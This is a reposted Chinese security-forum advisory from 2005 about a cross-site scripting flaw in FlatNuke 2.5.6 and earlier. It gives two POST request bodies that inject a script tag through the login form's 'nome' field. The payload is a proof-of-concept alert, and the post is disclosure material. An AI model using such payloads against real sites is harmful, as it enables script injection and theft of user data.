邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [转载]Flat Nuke跨站脚本漏洞以及测试方法 [查看完整版本]

EvilOctal 2005-10-26 04:27

[转载]Flat Nuke跨站脚本漏洞以及测试方法

信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

Web Site:

Vulnerable: FlatNuke <= 2.5.6

This script is possibly vulnerable to Cross Site Scripting (XSS) attacks

Malicious users may inject JavaScript, VBScript, ActiveX, into a vulnerable application to fool a user in order to gather data from them.

Affects http://[target]TEST/flatnuke-2.5.6/forum/index.php

The script has been tested with these POST variables:

op=login&nome=<script>alert(&#39;LOL&#39;);</script>&regpass=1&reregpass=1&anag=
1&email=1&homep=http%3A%2F%2F&prof=1&prov=1&ava=1&url_avatar=1&firma=1

op=login&from=home&nome=<script>alert(&#39;LOL&#39;);</script>&logpassword=1

Best Regards
Alex

查看完整版本: [转载]Flat Nuke跨站脚本漏洞以及测试方法

© 1999-2008 EvilOctal Security Team